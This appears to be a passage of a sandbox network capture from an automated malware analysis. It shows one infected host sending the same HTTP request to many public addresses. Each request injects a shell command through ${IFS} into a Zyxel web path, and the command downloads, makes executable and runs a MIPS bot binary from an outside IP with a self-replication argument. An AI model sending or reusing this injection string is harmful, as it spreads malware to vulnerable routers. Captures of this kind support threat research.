                                      Jan 19, 2024 17:29:36.860399008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5433192.168.2.145153037.179.10.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860439062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5434192.168.2.144374681.240.72.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860479116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5435192.168.2.1443600131.73.174.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860512018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5436192.168.2.143821841.35.80.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860542059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5437192.168.2.1454478100.150.240.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860671997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5438192.168.2.1442554141.211.54.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860704899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5439192.168.2.1456702170.238.221.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860744953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5440192.168.2.143355845.54.49.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860790968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5441192.168.2.1438080132.169.245.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860824108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5442192.168.2.14593468.64.106.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860848904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5443192.168.2.1440348109.190.59.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860878944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5444192.168.2.1450980146.37.162.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860929012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5445192.168.2.1448708195.75.252.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860971928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5446192.168.2.1448664169.69.0.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861005068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5447192.168.2.1458956184.106.149.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861036062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5448192.168.2.144689432.135.84.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861068964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5449192.168.2.1453492122.218.208.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861109972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5450192.168.2.1451924107.59.201.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861141920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5451192.168.2.1449112173.149.238.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861166000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5452192.168.2.1435274209.24.0.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861227989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5453192.168.2.143672439.8.173.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861252069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5454192.168.2.145529018.194.155.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861308098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5455192.168.2.144640639.10.179.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861356974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5456192.168.2.1459988112.169.116.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861407042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5457192.168.2.1437268113.245.50.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861449957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5458192.168.2.1454078209.45.105.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861459017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5459192.168.2.1448504204.212.87.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861484051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5460192.168.2.144135689.5.233.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861520052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5461192.168.2.144154217.191.79.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861550093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5462192.168.2.145376079.12.234.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861583948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5463192.168.2.145416854.192.132.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861605883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5464192.168.2.1454736207.217.244.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861644983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5465192.168.2.145135866.198.116.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861675024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5466192.168.2.144109683.144.102.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861713886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5467192.168.2.143700673.20.116.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861757994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5468192.168.2.1452920133.84.189.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861787081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5469192.168.2.144754025.34.152.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861824989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5470192.168.2.1441612122.172.63.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861851931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5471192.168.2.1455840172.117.130.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861897945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5472192.168.2.143738061.159.111.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861938953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5473192.168.2.1446394149.18.104.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.861970901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5474192.168.2.144294483.179.140.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862001896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5475192.168.2.1452354169.59.61.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862052917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5476192.168.2.1447472156.15.198.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862096071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5477192.168.2.145529858.79.243.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862131119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5478192.168.2.1448584102.144.162.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862160921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5479192.168.2.1436924188.108.250.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862202883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5480192.168.2.143566282.146.63.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862222910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5481192.168.2.1444596176.113.113.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862265110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5482192.168.2.1445738156.13.190.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862302065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5483192.168.2.144871275.73.95.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862361908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5484192.168.2.1453508131.15.208.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862390041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5485192.168.2.146011260.212.197.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862415075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5486192.168.2.145247620.68.53.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862446070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5487192.168.2.143537479.130.20.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862493038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5488192.168.2.1457148134.0.77.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862540007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5489192.168.2.1444186174.130.66.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862576008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5490192.168.2.143425284.148.33.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862606049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5491192.168.2.144480070.91.160.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862641096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5492192.168.2.144095044.69.39.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862684011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5493192.168.2.1453308206.198.18.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862730026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5494192.168.2.1441906211.76.104.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862750053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5495192.168.2.1435672100.128.40.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.862809896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5496192.168.2.1444228202.126.201.190443
                                      TimestampBytes transferredDirectionData
